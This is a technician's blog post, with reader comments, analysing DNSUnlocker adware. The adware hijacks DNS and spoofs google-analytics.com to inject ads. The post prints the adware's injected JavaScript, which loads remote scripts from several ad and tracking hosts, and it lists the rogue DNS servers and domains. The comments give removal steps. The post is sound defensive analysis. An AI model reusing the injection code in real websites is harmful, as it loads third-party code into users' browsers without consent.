The mystery of “82.163.143.172” and “82.163.142.174”

Update: These same people are also using “82.163.143.171”, “82.163.142.173”, “82.163.143.173”, “82.163.142.5” and “95.211.158.132” and another host name of “m75.dnsqa.me”. See the bottom of the article for the new Javascript they use. Note that they now hide the settings under the adapter IPv4 settings –> Advanced button –> DNS tab and in the top box. (Rather than just in the main IPv4 settings screen with the 2 dns entry boxes).

Today I’ve had two customers report unusual adverts appearing on their computers.

Both had the same change in common.

First their network card DNS servers had been changed to:

DNS Servers . . . . . . . . . . . : 82.163.143.172
DNS Servers . . . . . . . . . . . : 82.163.142.174

Potentially other related servers: 199.203.131.145 (51-1d.dnsunlocker.com), 82.163.143.167 (51-2d.dnsunlocker.com)

Secondly they had a strange program, DNSUnlocker, running from c:\ProgramData\{random-numbers} with a blue shield icon. There is also at least one entry in Task Scheduler relating to the crap.

The biggest unknown I have is how did the junk get onto their computers in the first place.
In the most recent case I believe it came from a website claiming that the visitor required Java and served them this junk which changed the DNS.

The DNS servers re-write the answers to requests to, at least, http://www.google-analytics.com.
http://www.google-analytics.com/urchin.js gets modified and the following line is injected:

	/* DNS Quality Check */
	if (typeof dns_qc === 'undefined') {
	    var dns_qc = document.createElement('script');
	    dns_qc.type = 'text/javascript';
	    dns_qc.src = 'http://m56.dnsqa.me/QualityCheck/ga.js';
	    var dns_qc_head = document.getElementsByTagName('head')[0];
	    if (dns_qc_head) {
	        dns_qc_head.appendChild(dns_qc);
	    }
	}

The domain is spoofed / hosted on 82.163.143.94 instead of the real google server 216.58.208.78.
Weirdly the scam server seems to have an SSL certificate with the following attributes:

CN = cloudguard.me
OU = Web
O = GreenTeam Internet, Ltd.
L = Hertzilia
S = Gush Dan
C = IL
Thumbprint: d5e4b0c12afb93aa71b510cc9d0db33556c82191

It looks like the junk had also installed a trusted root certificate on the machine!

Thumbprint: 26d9e607fff0c58c7844b47ff8b6e079e5a2220e
Serial Number: 00b6e1abf38b9ab41a

You can trick the scam server into printing out their injected code too by visiting:

http://82.163.143.94/urchin.js

Cloudguard and DNSUnlocker names then re-appear in the other script http://m56.dnsqa.me/QualityCheck/ga.js (m56.dnsqa.me is the same IP as the above inline injecting server)

/* CloudScout QA [56 PROD] */
var isMSIE = /*@cc_on!@*/ 0;

function isIE() {
    var myNav = navigator.userAgent.toLowerCase();
    return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;
}
if (isIE() == 8) { // IE 8 not supported
} else if (isMSIE & amp; & amp; isIE() != 9 & amp; & amp; document.all & amp; & amp; !document.querySelector) { // IE 7 or lower not supported
} else {
    var dns_qcs3 = document.getElementsByTagName('script')[0];
    var dns_qc3 = document.createElement('script');
    dns_qc3.type = 'text/javascript';
    dns_qc3.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'cdncache-a.akamaihd.net/sub/b156ae9/56001/l.js?pid=2202&ext=DNSUnlocker';
    dns_qcs3.parentNode.insertBefore(dns_qc3, dns_qcs3);
    var dns_qcs5 = document.getElementsByTagName('script')[0];
    var dns_qc5 = document.createElement('script');
    dns_qc5.type = 'text/javascript';
    dns_qc5.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'cdncache-a.akamaihd.net/sub/b156ae9/56001/l.js?pid=2204&ext=DNSUnlocker';
    dns_qcs5.parentNode.insertBefore(dns_qc5, dns_qcs5);
    var dns_qcs6 = document.getElementsByTagName('script')[0];
    var dns_qc6 = document.createElement('script');
    dns_qc6.type = 'text/javascript';
    dns_qc6.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'shopperz.utop.it/tb/host.jsp?pid=75041&said=56001&san=DNSUnlocker&met=1|0';
    dns_qcs6.parentNode.insertBefore(dns_qc6, dns_qcs6);
    var dns_qcs8 = document.getElementsByTagName('script')[0];
    var dns_qc8 = document.createElement('script');
    dns_qc8.type = 'text/javascript';
    dns_qc8.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'istatic.eshopcomp.com/fo/ec/gteamrs.js?subid=56001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.vidcreek.tv';
    dns_qcs8.parentNode.insertBefore(dns_qc8, dns_qcs8);
    var dns_qcs7 = document.getElementsByTagName('script')[0];
    var dns_qc7 = document.createElement('script');
    dns_qc7.type = 'text/javascript';
    dns_qc7.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'istatic.eshopcomp.com/fo/ec/gteamqc.js?subid=56001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.vidcreek.tv';
    dns_qcs7.parentNode.insertBefore(dns_qc7, dns_qcs7);
}

The following are true:
-Scam servers are in Israel and the CloudGuard company appears to be in Israel
-Scam domains and CloudGuard domain are registered with the same privacy service
-Scam domain and CloudGuard domain use the same nameservers
-CloudGuard has been implicated in advert infections in the past

Given the above I would say this is a potentially legitimate company (in the past) turned rogue.

One of the features of this junk is the DNS they are hijacking is showing (an actually accurate message this time) scam support company advert saying you have an infection on your computer.

One other annoyance is even though you’ve removed the crap from the computer it will still show adverts being injected into pages. You must clear all your browser caches to clear this junk.

notice alerted onlineweb11 com scam message

youihk adobe software scam

The crapware writers even have uninstall instructions on their website.. http://www.vidcreek.tv/viewtopic.php?f=6&t=6

Update – 12th Feb 2016 – The latest Javascript they use is:

/* 75/6/GB  */
window._rvz9560x1009 = {'publisher_subid':'75001', 'addonname': 'DNSUnlocker'};
window._rvz9560x1010 = {'publisher_subid':'75001', 'addonname': 'DNSUnlocker'};
(function() {
  var gtprv = {
    isIE : function () { var myNav = navigator.userAgent.toLowerCase(); return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false; },
    loadJS : function (gturl) {
      var dns_qcs8 = document.getElementsByTagName('script')[0];
      var dns_qc8 = document.createElement('script'); dns_qc8.type='text/javascript';
      dns_qc8.src=('https:' == document.location.protocol ? 'https://' : 'http://')+gturl;
      dns_qcs8.parentNode.insertBefore(dns_qc8, dns_qcs8);
    },
    loadJSON: function (callback) {
        var xobj = new XMLHttpRequest();
        xobj.overrideMimeType("application/json");
        xobj.open('GET', ('https:' == document.location.protocol ? 'https://' : 'http://')+'m75.dnsqa.me/QualityCheck/x.txt', true);
        xobj.onreadystatechange = function () {
          if (xobj.readyState == 4) {
            if (xobj.status == "200") {
              callback(xobj.responseText);
            } else {
              callback('0');
            }
          }
        };
        xobj.send(null);
    },
    init : function() {
      var isMSIE = /*@cc_on!@*/0;
      if (gtprv.isIE () == 8) return; // IE 8 not supported
      if (isMSIE && gtprv.isIE()!= 9 && document.all && !document.querySelector) return; // IE 7 or lower not supported
      gtprv.loadJSON(function(response) {
        // Parse JSON string into object
        var actual_JSON = JSON.parse(response);
        if (actual_JSON) actual_JSON=parseInt(actual_JSON);
        else actual_JSON=0;
        if (actual_JSON==0) {
		if (window.name.indexOf('_odctxdsp') == 0) {
			//do nothing
		} else if ((window.name || '').match(/^(a652c|ld893)_/))  {
			gtprv.loadJS('cdncache-a.akamaihd.net/sub/b156ae9/75001/l.js?pid=2204&ext=DNSUnlocker');
		} else {
			if(window.top==window.self) {
                                var gtURL = encodeURIComponent(window.location.protocol + "//" + window.location.host + window.location.pathname);
                                gtprv.loadJS('asrvvv-a.akamaihd.net/get?addonname=DNSUnlocker&clientuid=&subID=75001&affid=9560&subaffid=1011&href='+gtURL);
                        }
          		gtprv.loadJS('cdncache-a.akamaihd.net/sub/b156ae9/75001/l.js?pid=2204&ext=DNSUnlocker');
          		gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gteamrs.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
          		gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gteamqc.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
          		gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gtinimgtest.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
			gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gtsticky.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
			gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gtxt.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
                        //gtprv.loadJS('istatic.eshopcomp.com/fo/ec/gtjob.js?subid=75001&bname=DNSUnlocker&blink=http%3A%2F%2Fwww.dnsunlocker.com');
          		if(window.top==window.self) {
          			gtprv.loadJS('grl.qomesn.com/sd/9560/1009.js');
				gtprv.loadJS('asrv-a.akamaihd.net/sd/9560/1010.js');
          		}
			//
          		gtprv.loadJS('w3i.co/welcome?pid=75041&said=75001&san=DNSUnlocker&met=1|0');
			//
			if('600552'.length === 0) {
				// do nothing
			} else {
                           if(window.top==window.self) {
                                var lbscript = document.createElement("script");
                                lbscript.src = "//d32zx4lhje2crr.cloudfront.net/?tid="+ (location.protocol == "https:" ? "600552" : "600553");
                                lbscript.id = "ahjkjgf";
                                lbscript.setAttribute("bname", "DNSUnlocker");
                                document.getElementsByTagName("head")[0].appendChild(lbscript);
                           }
			}
                        //
		}
        }
      });
    }
  }
  gtprv.init();
})();

Also related is yxo.warmportrait.com, ddc.terrestrialthese.com, nsl.mapticket.net, here.sendevent.net, qei.wettednurserymen.com, w3i.co and sjb.salivaunsnarlreprint.com

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

37 Responses to The mystery of “82.163.143.172” and “82.163.142.174”

  1. Pingback: The “notice-alerted-onlineweb11.com” tech support scam. | thecomputerperson

  2. etychon says:

    Thanks for the hint, this just happened to a friend of mine. It helps as we were wondering WTF happened to the DNS.

  3. Deano says:

    Thanks! This just happened to me and this was the only result in google that helped!

  4. Felix Österreicher says:

    I was infected too with the malware mentioned above (I still have no idea where it came from). After I run a malware remover, google ads still get replaced, but only when viewing in Thunderbird, where I have javascript activated. It take a while for me to consider checking my DNS configuration, where I found this strange IP.
    Thank you for posting these information, helped me a lot.

  5. Alvin Lim says:

    how to rectify this ….

  6. This information is in the main post.. however.
    Set your network card DNS back to Automatic.
    Uninstall DNSUnlocker.
    Find it’s folder in c:\ProgramData\{random-numbers-here} and delete it.

  7. Danielle says:

    Thank you heaps for this information. I just thought this thing had infiltrated into the dregs of my program files since no malware remover or CC Cleaner was helping in the slightest. DNS settings showed the truth. You rock.

  8. Does anyone know how they got this bit of crap?

  9. Susan says:

    Hi. Thanks for all the tips. I’m still stuck though. I deleted the program. I switched my DNS back to automatic. I deleted all the extra folders with random numbers in my C:\ProgramData\ folders. I reset the browser settings to default and cleared all the cache and everything else and I STILL have the crap!!! Any other ideas?

  10. Rebooted? Or cleared dns cache using ipconfig /flushdns?

  11. Susan says:

    Yes to both. Ugh.

  12. Susan says:

    No luck. This is maddening.

  13. Susan says:

    This is only happening in Mozilla Firefox. Not in Explorer by the way. If that makes any sense.

  14. I’m a bit stuck now without having access to the machine.
    Possibly check the firefox plugins / addins section.. or just scrap your firefox profile and start again fresh.

  15. Susan says:

    I did go through the plug ins/add ons/extensions section. I also reset the browser to factory settings. Then I ended up deleting Mozilla entirely and reinstalling and it STILL was there. I also tried deleting from the regedit. I could search for the terms Mozilla and Firefox. There were two files it wouldn’t let me delete. The directions for unistalling from Vidcreek.tv say you need to be in administrator mode, but I am. I’m the only profile on the computer and it’s an administrator profile. This is so insane. I’m really beside myself here. Thanks for all your feedback. You’ve been very generous with your time.

  16. Susan says:

    Got it!!!!! Needed to do a search for dnsunblocker in regedit. Deleted all the entries. For good measure, I then reset the browser settings to the default settings and deleted one particular bookmarked page that seemed to be corrupted. Amen.

  17. Khael says:

    Use CMD (As Administrator):
    netsh winsock reset
    ipconfig /flushdns

    Look into Internet Connection Settings / TCP-IP Prot. v4. And set DNS server in automatically mode.
    Use “SpyHunter” for cleaning.

  18. Nicki says:

    I’ve experienced these same ads by DNS Unlocker, and have scanned my machine with Malware Bytes, FortiClient and AdwCleaner. AdwClean did identify a few files, but no installed programs that had to be removed. I still got these ads, and my current thinking is that there must be a poisoned DNS entry for google-analytics.com that gets served every now and then, causing the ads to be displayed. I’m seeing very much the same scripts as posted by the author. The DNS servers on my pc are intact, so there must be a DNS server further upstream causing the injection of the rogue analytics script?

  19. Cleared your browser cache?
    If you visit http://www.google-analytics.com/urchin.js do you see the DNS cache lines?
    If you visit http://www.google-analytics.com/urchin.js?nocache=true do you still see the DNS cache lines?

  20. Nicki says:

    My machine is sorted, I’ve reset chrome and it is not coming back. AdBlock prevents it from loading. What is interesting is that I saw on someone else’s computer in the chrome:net-internals#dns view that m51.dnsqa.me was resolving to 127.42.0.1. If he tries to go to that URL Malware Bytes realtime pops up a message saying it has blocked access to 199.203.131.130?? This seems to me like he has some local component acting as a proxy. Netstat -an does not show anything listening on 127.42.0.0 though, any ideas which app might help?

  21. Nicki says:

    I’ve since determined that Malware Bytes’ realtime component intercepts DNS and returns the local ips in the 127.42 range, which redirects to block.malwarebytes.org.

  22. Jaco says:

    I’ve wasted a lot of time trying to remove DNS Unlocker – but just can’t find the application that is pulling the trigger all the time. Thankfully – Malwarebytes detects an outbound request for m56.dnsqa.me (127.42.0.1) and blocks it. So despite running various anti-malware programs – it’s still on my Laptop. I’ve done a ipconfig /flushdns, my DNS settings is automatic, I’ve cleared all my cache in my browsers + reset them, I’ve scanned through my registry – but can’t find anything,……..

    Is there a way to see which process on the Laptop triggers the request to go to m56.dnsqa.me?…….. That might help me finding the culprit…. (I’ve tried to look at the resource monitor to see which process run once I open a website that causes this problem – but can’t isolate the culprit)…

  23. Nicki says:

    Jaco some rogue DNS entry for google-analytics.com points to a server that servers a analytics.js script including a ref to m??.dnsqa.me. So either the DNS on your machine is suspect, or a DNS server upstream from your machine is returning the rogue value, or there is a compromised google-analytics.com server (seems unlikely). Most sites use google analytics for stats, so that is how the script gets injected. My machine has been checked by a few tools, and they did not find any infection, yet the ads pop up on sites like takealot.com and others that use google analytics. Using an ad blocker like AdBlock in Chrome can also help. Make sure that you reset your browser (it clears history, cache, etc) as well, have you tried AdwCleaner?

  24. Jaco says:

    Thank you Nicki for the additional information. Yip – I used ADWCleaner etc. I somethimes jumped around DNS entries – so when I use a static IP – I always use Googles DNS IP – namely 8.8.8.8 and 8.8.4.4. Since you refer to google-analytics.com – I won’t be surprise that many other people out there is using Google DNS IP’s for DNS…… Hence why so many other people experiencing the same issues…

    However – I did manage to a breakthrough eventually when I did the following:

    I first went into Safe Mode and reset all my browsers to default + deleting all personal data cache etc.

    I then went back into Windows 7 and downloaded Malware Bytes Free Edition and Avast Free Edition. Have updated them and scanned my Laptop. Most importantly – I’ve enabled the Avast extension in Chrome + I’ve installed Block Site (an extension available on Chrome).

    When I opened Chrome and went to (in my case http://www.webroot.com) – that’s where all the DNS Locker ads where + getting redirected after a few seconds – Malware Bytes then jumped-up with a little window – indicating an outbound request for m56.dnsqa.me. I made a note of this on a piece of paper.

    Then – I went into the Block Site extension and blocked m56.dnsqa.me. I then opened the Avast extension and under DO NOT TRACK – I selected the following 1) Block ad tracking by default, 2) Block web analytics by default, 3) Block others by default.

    Since then – I haven’t had any issues any more.

    Hope this might help someone out there!

  25. Mahmoued says:

    Hello, i am just a user but when i use internet and always when i open Origin (similar to steam) i get malwarebytes message telling me that m64.dnsqa.me ip has been blocked, i dont know how this ip keeps reaching my pc malwarebyte or hitmanpro or avg cant find his method. and its popping ads inside origin interface. this started after a program called dnsblock got installed while my brother doesnt remember installing it.

  26. nick37332001 says:

    This DNS Unlocker thing affects linux as well… After blocking these IP addresses on my router, it seems that it reappears. It seems to inject itself into html even with adblock enabled…

    This virus seems to have a mind of its own and usually injects itself into less frequented websites/never visited before websites in obscure places like words in blogs bolded, hyperlinked, and underlined. It’s quite obvious for me to spot it though. Once I get an example of this, I will show you the screenshot of what it does.

  27. Alireza says:

    I did all of those steps mentioned, I still have the crapware :(

  28. Nicki says:

    You need to clear your browser’s cache to get rid of the rogue script. Also, have you tried installing Malwarebytes and activating the Premium trial? Or installing an adblocker and blocking *.dnsqa.me?

  29. Gary says:

    I also have this DNSUnlocker and cannot get rid of it, no matter what I try.

  30. Gaz says:

    you need to remove these entries make them blank with regedit:
    HKLM\System\CCS\Services\Tcpip\..\{B2AD56A0-C00C-497D-B00C-CDDE2602821F}: NameServer = 82.163.143.157,82.163.142.159O17
    HKLM\System\CCS\Services\Tcpip\..\{CEFD8B43-5DCF-4F4B-AB04-9CE5BC3390AE}: NameServer = 82.163.143.157,82.163.142.159O17
    HKLM\System\CCS\Services\Tcpip\..\{E71E7B0F-BEFA-44CD-A88B-486C243B4499}: NameServer = 82.163.143.157,82.163.142.159O17
    HKLM\System\CCS\Services\Tcpip\..\{F7303DDF-1D80-4E89-9EFA-E22263CF337E}: NameServer = 82.163.143.157,82.163.142.159

  31. Thank you for the information but I expect the numbers in brackets will be unique to the network adapters on your system. A good pointer though.

  32. Gaz says:

    Yes… Good point I should have been clearer.

  33. Jack says:

    hi,
    I had tried every other steps mentioned, still i am getting ads(DNS Unlocker) on my browser.
    My DNS setting is automatic, reset browser, tried flush DNS, did scan with malwarebytes, hitman pro, re-install browser but no go.

    can any one suggest me for workaround?

  34. Does the problem go away if you use a different web browser? If so – you need to clear your normal web browser cache.
    If the problem still exists with another browser then it is likely that your DNS settings are still maimed. Make sure you’ve also checked the advanced IPv4 settings DNS tab too as that was another place they hid the dns servers in one of my experiences.

  35. Gaz says:

    Search through the registry for those ip addresses. Use hijack this and you’ll see them.

  36. Jack says:

    The problem with all browsers, I tried chrome, Firefox, opera etc. I do checked DNS setting and in advanced setting too. I tried NETSH WINSOCK RESET and ICONIC /FLUSHING. But the issue still persists

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s